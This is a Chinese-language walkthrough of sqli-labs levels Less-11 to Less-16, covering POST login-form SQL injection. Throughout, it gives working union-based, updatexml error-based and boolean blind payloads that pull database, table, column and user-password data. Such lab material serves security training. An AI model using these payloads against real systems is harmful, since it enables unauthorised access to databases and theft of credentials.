)
Less-11
发现该题为post注入,测试注入点发现为',开始写注入语句,使用burpsuite抓包分析
在数字1处进行sql注入
1' --+
1' order by 2 --+
1' union select 11,22 --+
1' union select 11,database()--+
uname=1' union select 11,group_concat(table_name) from information_schema.tables where table_schema='security'--+&passwd=1&submit=Submit
uname=1' union select 11,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'--+&passwd=1&submit=Submit
uname=1' union select 11,group_concat(username,password) from users--+&passwd=1&submit=Submit
PHP源码分析
分析发现,该处为使用post接收两个值,将它拼接为sql语句
Less-12
简单测试,发现闭合为 ") uname=1")--+&passwd=1&submit=Submit
uname=1") union select 11,database()--+&passwd=1&submit=Submit
发现成功,其余步骤跟Less-11一致
Less-13
uname=1') --+&passwd=1&submit=Submit 测试发现此处为')
uname=1') order by 2--+&passwd=1&submit=Submit 测试发现页面无回显
使用报错注入
uname=1') union select 11,updatexml(1,concat(0x7e,(select database()),0x7e),1)--+&passwd=1&submit=Submit
uname=1') union select 11,updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 3,1) ,0x7e),1)--+&passwd=1&submit=Submit
uname=1') union select 11,updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' and table_schema='security' limit 1,1) ,0x7e),1)--+&passwd=1&submit=Submit
uname=1') union select 11,updatexml(1,concat(0x7e,(select username from users limit 1,1) ,0x7e),1)--+&passwd=1&submit=Submit
uname=1') union select 11,updatexml(1,concat(0x7e,(select password from users limit 0,1) ,0x7e),1)--+&passwd=1&submit=Submit
Less-14
测试发现此处闭合条件为 " 且为无回显
uname=1" union select 11,updatexml(1,concat(0x7e,(select database()),0x7e),1)--+&passwd=1&submit=Submit
uname=1" union select 11,updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x7e),1)--+&passwd=1&submit=Submit
uname=1" union select 11,updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' and table_schema='security' limit 0,1),0x7e),1)--+&passwd=1&submit=Submit
uname=1" union select 11,updatexml(1,concat(0x7e,(select password from users limit 0,1),0x7e),1)--+&passwd=1&submit=Submit
此题目与上题一致,仅为闭合条件不同
Less-15(补充知识看之前文章Less-8)
测试发现无报错信息也无回显,考虑使用盲注,通过使用Less-8一样的方法,不断测试
uname=1' or '1'='1'--+&passwd=1&submit=Submit 测试出闭合条件
uname=1' or '1'='1' order by 2--+&passwd=1&submit=Submit 测试为2列
uname=1' or '1'='1' union select 11,22--+&passwd=1&submit=Submit 接下来开始猜解
uname=1' or '1'='1' and (length(database()))=8--+&passwd=1&submit=Submit 只有8时为正确页面,说明数据库为8位
uname=1' or '1'='1' and (ascii(substr(database(),1,1)))=115--+&passwd=1&submit=Submit 说明数据库名字第一个字母为s
同理可得uname=1' or '1'='1' AND ASCII(SUBSTR((SELECT table_name FROM information_schema.tables WHERE table_schema='security' LIMIT 0,1), 1, 1)) = 101--+&passwd=1&submit=Submit 猜解表名和列名即可
Less-16
uname=1") or 1=1--+&passwd=1&submit=Submit 此处的闭合条件为")其余步骤与Less-15一致,均使用盲注的方法解决
)
)
)